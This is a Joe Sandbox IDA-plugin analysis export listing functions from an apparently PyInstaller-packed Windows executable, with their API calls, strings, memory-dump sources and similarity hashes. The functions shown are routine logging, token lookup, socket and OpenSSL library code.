API String ID: 2559590344-2084034818
Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
Instruction ID: 1f0bd83040a55d53c6d5b4b6819bfb02be1bffa582e94192a484a4dc266990fa
Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
Instruction Fuzzy Hash: 1C316A21B1BA4291FE32EB22A800965B394FF59BE1FD9457DED1D46394EF3CE4448230

Function 00007FF79A312A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF79A31351A,?,00000000,00007FF79A313F23), ref: 00007FF79A312AA0

Strings

[PYI-%d:%s] , xrefs: 00007FF79A312AA8
Warning [ANSI Fallback], xrefs: 00007FF79A312B0F
0, xrefs: 00007FF79A312B16
WARNING, xrefs: 00007FF79A312AAF
Warning, xrefs: 00007FF79A312B1E

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: CurrentProcess
String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-2900015858
Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
Instruction ID: 366ca9ae1c83fe915555ca5047e42d73b1c72a33ed67f77454b9a75b4c914870
Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
Instruction Fuzzy Hash: 85217F32A1A78182F670EB61B8817E6B394FB88784F80017EFE8C43659DF7CD6458750

Function 00007FF79A318760 Relevance: 10.6, APIs: 7, Instructions: 63COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF79A318780
OpenProcessToken.ADVAPI32 ref: 00007FF79A318793
GetTokenInformation.ADVAPI32 ref: 00007FF79A3187B8
GetLastError.KERNEL32 ref: 00007FF79A3187C2
GetTokenInformation.ADVAPI32 ref: 00007FF79A318802
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF79A31881E
CloseHandle.KERNEL32 ref: 00007FF79A318836

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: 1e3bf3a8b1345e2c0c0bdd6ff4e06add0bb9355989cc78c5a669156b3459c754
Instruction ID: dd8c85cd44562e659655ac29c99e1bc5d5451cfb855f5b8be24bd74d21e16da3
Opcode Fuzzy Hash: 1e3bf3a8b1345e2c0c0bdd6ff4e06add0bb9355989cc78c5a669156b3459c754
Instruction Fuzzy Hash: E8215E31E0D64242FB20AB75F49422AF7A1FB857A0F90427DEAAD43AE8DF6CD4448710

Function 00007FF79A32B1C0 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF79A32B1CF
FlsGetValue.KERNEL32 ref: 00007FF79A32B1E4
FlsSetValue.KERNEL32 ref: 00007FF79A32B205
FlsSetValue.KERNEL32 ref: 00007FF79A32B232
FlsSetValue.KERNEL32 ref: 00007FF79A32B243
FlsSetValue.KERNEL32 ref: 00007FF79A32B254
SetLastError.KERNEL32 ref: 00007FF79A32B26F

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 64d992c46ee3b7395fe78fb810fe312dfe396e54660f00f57cdb80144ae96788
Instruction ID: 40b21d87861405551dd29c9adcbdeb250ea76e23b17a8eca0879de3400dcda30
Opcode Fuzzy Hash: 64d992c46ee3b7395fe78fb810fe312dfe396e54660f00f57cdb80144ae96788
Instruction Fuzzy Hash: 20210C20E0F34642FA787B71AA5917DF2929F447A0F9486BCED3E466D6DE2CB8414320

Function 00007FFEDD277C3C Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON

Download Yara Rule

APIs

htons.WS2_32 ref: 00007FFEDD277CB6
getservbyport.WS2_32 ref: 00007FFEDD277CC4

Strings

socket.getservbyport, xrefs: 00007FFEDD277C89
port/proto not found, xrefs: 00007FFEDD277CE7
i|s:getservbyport, xrefs: 00007FFEDD277C4C
getservbyport: port must be 0-65535., xrefs: 00007FFEDD277D15

Memory Dump Source

Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true

Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd

Similarity

API ID: getservbyporthtons
String ID: getservbyport: port must be 0-65535.$i|s:getservbyport$port/proto not found$socket.getservbyport
API String ID: 3477891686-2618607128
Opcode ID: 958b96406755ee6dfe24f7a4625e947aabcd92a470a3e42bae2d05d6fec3ec86
Instruction ID: 1b6dc510a6631848e466a5f358a6e67ed3824f71c9bbea58815cbc16d250a2ec
Opcode Fuzzy Hash: 958b96406755ee6dfe24f7a4625e947aabcd92a470a3e42bae2d05d6fec3ec86
Instruction Fuzzy Hash: 8121E631A18A03A1EA309B16E85467D6371FBC9BA5F580033DA4E47E78EF7DE048C700

Function 00007FF79A337DDC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF79A337E0D
GetLastError.KERNEL32 ref: 00007FF79A337E19
CloseHandle.KERNEL32 ref: 00007FF79A337E31
CreateFileW.KERNEL32 ref: 00007FF79A337E5C
WriteConsoleW.KERNEL32 ref: 00007FF79A337E7B

Strings

CONOUT$, xrefs: 00007FF79A337E3D

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
Instruction ID: a82c8a6454abc9f9a96854bade8cba12e1fb63ec7c658794435a6b7df54cae6c
Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
Instruction Fuzzy Hash: 4C118721B1DA4586F360AB62F854329B3A0FB48FE4F90427CEA5D877A4DF7CD8048750

Function 00007FFEDCBF231F Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 388COMMON

Download Yara Rule

APIs

00007FFEFBBD08A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFEDCC57B72

Strings

..\s\ssl\statem\statem_clnt.c, xrefs: 00007FFEDCC57B10, 00007FFEDCC57B90, 00007FFEDCC57BAC, 00007FFEDCC57DBA, 00007FFEDCC57E51, 00007FFEDCC57EC1, 00007FFEDCC57F0B, 00007FFEDCC57F3B
tls_process_new_session_ticket, xrefs: 00007FFEDCC57B09, 00007FFEDCC57DAE, 00007FFEDCC57E45, 00007FFEDCC57F04
SHA2-256, xrefs: 00007FFEDCC57D3D
resumption, xrefs: 00007FFEDCC57E7A

Memory Dump Source

Source File: 00000002.00000002.1751324837.00007FFEDCBF1000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFEDCBF0000, based on PE: true

Associated: 00000002.00000002.1751293524.00007FFEDCBF0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751324837.00007FFEDCC73000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751324837.00007FFEDCC75000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751324837.00007FFEDCC9D000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751324837.00007FFEDCCA8000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751324837.00007FFEDCCB3000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751596856.00007FFEDCCB7000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751637595.00007FFEDCCB8000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedcbf0000_sppawx.jbxd

Similarity

API ID: 00007
String ID: ..\s\ssl\statem\statem_clnt.c$SHA2-256$resumption$tls_process_new_session_ticket
API String ID: 3568877910-1635961163
Opcode ID: aa3d85a4cbc314c83165fc7c7836ff9eeeabadabe142487fe9ec6a464303ce07
Instruction ID: 20da9a1bb402cca6db5582f98c742776a281beedebf3143851204a1b0430687a
Opcode Fuzzy Hash: aa3d85a4cbc314c83165fc7c7836ff9eeeabadabe142487fe9ec6a464303ce07
Instruction Fuzzy Hash: B9027D72B5DA8281EB109B19E4402BD77A1EB84BC4F188137DB8D47BA5DF3DE592CB01

Function 00007FF79A318560 Relevance: 9.1, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF79A319216), ref: 00007FF79A318592
K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF79A319216), ref: 00007FF79A3185E9

Part of subcall function 00007FF79A319400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF79A3145E4,00000000,00007FF79A311985), ref: 00007FF79A319439

K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF79A319216), ref: 00007FF79A318678
K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF79A319216), ref: 00007FF79A3186E4
FreeLibrary.KERNEL32(?,?,00000000,00007FF79A319216), ref: 00007FF79A3186F5
FreeLibrary.KERNEL32(?,?,00000000,00007FF79A319216), ref: 00007FF79A31870A

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: b2770b171440e78660be4c91fda42c27049aa369c6710ced6bdf6821ec2ad01d
Instruction ID: dba5e01fc88a54f0df9eb652ebd4e3ee7c3ac9c6ab4bfd903598468ac0cea3c9
Opcode Fuzzy Hash: b2770b171440e78660be4c91fda42c27049aa369c6710ced6bdf6821ec2ad01d
Instruction Fuzzy Hash: 2B418162B1A68241FA70EB32A5446AAB394FB84BC4F85027DDF8D57B89DE3CD501C724

Function 00007FF79A3190E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF79A318760: GetCurrentProcess.KERNEL32 ref: 00007FF79A318780
Part of subcall function 00007FF79A318760: OpenProcessToken.ADVAPI32 ref: 00007FF79A318793
Part of subcall function 00007FF79A318760: GetTokenInformation.ADVAPI32 ref: 00007FF79A3187B8
Part of subcall function 00007FF79A318760: GetLastError.KERNEL32 ref: 00007FF79A3187C2
Part of subcall function 00007FF79A318760: GetTokenInformation.ADVAPI32 ref: 00007FF79A318802
Part of subcall function 00007FF79A318760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF79A31881E
Part of subcall function 00007FF79A318760: CloseHandle.KERNEL32 ref: 00007FF79A318836

LocalFree.KERNEL32(?,00007FF79A313C55), ref: 00007FF79A31916C
LocalFree.KERNEL32(?,00007FF79A313C55), ref: 00007FF79A319175

Strings

D:(A;;FA;;;%s), xrefs: 00007FF79A319157
D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF79A319142
Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF79A319183
S-1-3-4, xrefs: 00007FF79A319121

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
Instruction ID: 20e327d6d17f214a5e18aba345cb5dd2f49317a5bb8afa184f016e94d62aa5ab
Opcode Fuzzy Hash: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
Instruction Fuzzy Hash: 2E214B21A0E74282F660FB31E9152EAB3A4EF88780FC444BDEA4D53796DF3CD8458760

Function 00007FFEDD276FE4 Relevance: 9.1, APIs: 6, Instructions: 60networkCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FFEDD27701C
WSADuplicateSocketW.WS2_32 ref: 00007FFEDD27702C
WSASocketW.WS2_32 ref: 00007FFEDD27705F
SetHandleInformation.KERNEL32 ref: 00007FFEDD277078
closesocket.WS2_32 ref: 00007FFEDD27708D
closesocket.WS2_32 ref: 00007FFEDD2770B3

Memory Dump Source

Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true

Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd

Similarity

API ID: Socketclosesocket$CurrentDuplicateHandleInformationProcess
String ID:
API String ID: 174288908-0
Opcode ID: d16baa06ec3d4bbc466152658493e9ad99c42351d06faec33e887c6431ca5712
Instruction ID: c1112fa1fcd7df17206255556606ebe2509e48fb4fa4baa33b7d71bb3f21b4a4
Opcode Fuzzy Hash: d16baa06ec3d4bbc466152658493e9ad99c42351d06faec33e887c6431ca5712
Instruction Fuzzy Hash: 3A213224A1D74291EA749B31A81877D62A1BFC8BB4F080636D92E47BF4FF7CE0048600

Function 00007FF79A32B338 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF79A324F81,?,?,?,?,00007FF79A32A4FA,?,?,?,?,00007FF79A3271FF), ref: 00007FF79A32B347
FlsSetValue.KERNEL32(?,?,?,00007FF79A324F81,?,?,?,?,00007FF79A32A4FA,?,?,?,?,00007FF79A3271FF), ref: 00007FF79A32B37D
FlsSetValue.KERNEL32(?,?,?,00007FF79A324F81,?,?,?,?,00007FF79A32A4FA,?,?,?,?,00007FF79A3271FF), ref: 00007FF79A32B3AA
FlsSetValue.KERNEL32(?,?,?,00007FF79A324F81,?,?,?,?,00007FF79A32A4FA,?,?,?,?,00007FF79A3271FF), ref: 00007FF79A32B3BB
FlsSetValue.KERNEL32(?,?,?,00007FF79A324F81,?,?,?,?,00007FF79A32A4FA,?,?,?,?,00007FF79A3271FF), ref: 00007FF79A32B3CC
SetLastError.KERNEL32(?,?,?,00007FF79A324F81,?,?,?,?,00007FF79A32A4FA,?,?,?,?,00007FF79A3271FF), ref: 00007FF79A32B3E7

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 508bc4e8de0e80a19cd6daf9ed8871fa40715e6eab000f8b832e18dd1cfec2a0
Instruction ID: 38e3362a4eacfb75e83ecbf16b4a28812e42bfc1184b3967348f694af00986e0
Opcode Fuzzy Hash: 508bc4e8de0e80a19cd6daf9ed8871fa40715e6eab000f8b832e18dd1cfec2a0
Instruction Fuzzy Hash: CE113B20B0E64282FA74BB319A5517DF2829F447A0FD487BCEE2E467D6DE2CB4018321

Function 00007FF79A312910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF79A311B6A), ref: 00007FF79A31295E

Strings

%s: %s, xrefs: 00007FF79A3129E8
[PYI-%d:ERROR] , xrefs: 00007FF79A312966
Error [ANSI Fallback], xrefs: 00007FF79A3129FF
Error, xrefs: 00007FF79A312A0E

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: CurrentProcess
String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
API String ID: 2050909247-2962405886
Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
Instruction ID: f501e8dbccc9f18aa5ac0fcba33b4eebf876968e719e9e4b1fa66b54cfee513b
Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
Instruction Fuzzy Hash: 6531B522B1A68152F730EB75A8416E6B295BF887D8F80013DFE8D83755EF7CD5468610

Function 00007FF79A312390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF79A3123C8
DialogBoxIndirectParamW.USER32 ref: 00007FF79A31248E
DeleteObject.GDI32 ref: 00007FF79A3124C1
DestroyIcon.USER32 ref: 00007FF79A3124D3

Strings

Unhandled exception in script, xrefs: 00007FF79A3123F8

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: dd10c28d74256616f4f20b34f0e4914686707bcd8d030bd0fddff274f11205b5
Instruction ID: ea6164a33f99ea05d5061345a38fa5467f57571141975a36f91b6de440f74145
Opcode Fuzzy Hash: dd10c28d74256616f4f20b34f0e4914686707bcd8d030bd0fddff274f11205b5
Instruction Fuzzy Hash: 28314A72A1AA8289FB20EF71E8552F9B360FF89788F84017DEA4D47A49DF3CD1458710

Function 00007FFEDD2774F8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 79COMMON

Download Yara Rule

Strings

et:gethostbyaddr, xrefs: 00007FFEDD27752B
idna, xrefs: 00007FFEDD277521
socket.gethostbyaddr, xrefs: 00007FFEDD27754F
unsupported address family, xrefs: 00007FFEDD2775B2

Memory Dump Source

Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true

Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd

Similarity

API ID:
String ID: et:gethostbyaddr$idna$socket.gethostbyaddr$unsupported address family
API String ID: 0-1751716127
Opcode ID: e4f5240f7e4e449b1ad7fc171f0c48406e2e69f94d75fa22bb95770df805e3d6
Instruction ID: 1387a1cba94596b66ca95d3cfeca65820b0d6c34c8b591b979dbd5851756640a
Opcode Fuzzy Hash: e4f5240f7e4e449b1ad7fc171f0c48406e2e69f94d75fa22bb95770df805e3d6
Instruction Fuzzy Hash: 72311E61B08686A1EA709B16E8547AE6360FBD8BA4F480033DE8D47F74EE7CE449C700

Function 00007FF79A312B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF79A31918F,?,00007FF79A313C55), ref: 00007FF79A312BA0
MessageBoxW.USER32 ref: 00007FF79A312C2A

Strings

WARNING, xrefs: 00007FF79A312BAF
[PYI-%d:%ls] , xrefs: 00007FF79A312BA8
Warning, xrefs: 00007FF79A312C1D

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: CurrentMessageProcess
String ID: WARNING$Warning$[PYI-%d:%ls]
API String ID: 1672936522-3797743490
Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
Instruction ID: 2f389f5a7695937ff2bc29169c8e6a2f334d5f5fcfb6527f915c45107f6b20f4
Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
Instruction Fuzzy Hash: F021D122B09B4192F720EB65F8847EAB3A4FB88784F80013EEE8D57659DE3CD645C710

Function 00007FF79A312710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF79A311B99), ref: 00007FF79A312760

Strings

[PYI-%d:%s] , xrefs: 00007FF79A312768
Error [ANSI Fallback], xrefs: 00007FF79A3127CF
Error, xrefs: 00007FF79A3127DE
ERROR, xrefs: 00007FF79A31276F

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
